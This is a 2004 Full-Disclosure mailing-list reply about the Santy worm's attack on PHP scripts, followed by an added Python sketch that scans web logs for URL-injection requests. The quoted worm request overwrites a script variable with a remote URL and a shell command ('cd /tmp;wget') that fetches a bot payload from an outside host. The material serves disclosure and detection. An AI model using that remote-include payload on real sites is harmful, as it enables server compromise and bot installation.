[Full-Disclosure] Re: New Santy-Worm attacks *all* PHP-skripts

From: Pekka Savola (pekkasnetcore.fi)
Date: Sat Dec 25 2004 - 13:59:50 CST


On Sat, 25 Dec 2004, Juergen Schmidt wrote:
> It uses the Brazilian Google site to find all kinds of PHP scripts.
> It parses their URLs and overwrites variables with strings like:
>
> 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
> www.visualcoders.net/spybot.txt;...

And AFAICS, this can be prevented by setting register_globals=off in
php.ini.

--
Pekka Savola                 "You each name yourselves king, yet the
Netcore Oy                    kingdom bleeds."
Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
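
The request pattern quoted in the message above (a script variable overwritten through the URL with a remote address) can be looked for in web server logs, whether or not register_globals is off. This is an added example, not part of the original post; the Apache common log format, the addresses, host names and parameter names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of an Apache common/combined log line. The target is matched
# lazily up to " HTTP/x.y" so raw, unencoded spaces in the URL do not break it.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# A parameter whose value begins with a remote URL, as in the quoted request.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def suspicious_params(target):
    """Return [(name, value)] for query parameters whose value starts with a remote URL."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(v)]

def scan(lines):
    """Return [(client, path, param, value)] for every flagged parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line this sketch understands
        target = m.group(1)
        client = line.split(" ", 1)[0]
        for name, value in suspicious_params(target):
            hits.append((client, urlsplit(target).path, name, value))
    return hits

# Constructed sample lines (documentation addresses, placeholder host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Dec/2004:13:02:11 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [25/Dec/2004:13:02:15 +0000] '
    '"GET /view.php?page=http://host.example.invalid/x.gif?&cmd=PLACEHOLDER HTTP/1.0" 200 312',
    '192.0.2.77 - - [25/Dec/2004:13:02:16 +0000] '
    '"GET /view.php?inc=http%3A%2F%2Fhost.example.invalid%2Fx.gif%3F HTTP/1.0" 404 209',
    '192.0.2.31 - - [25/Dec/2004:13:03:40 +0000] '
    '"GET /search.php?q=what+is+http://+in+a+url HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for client, path, name, value in scan(SAMPLE_LOG):
        print(f"{client} {path} {name}={value!r}")
```

Legitimate parameters that carry a URL (a redirect target, for instance) match too, so hits are leads to review rather than confirmed attacks.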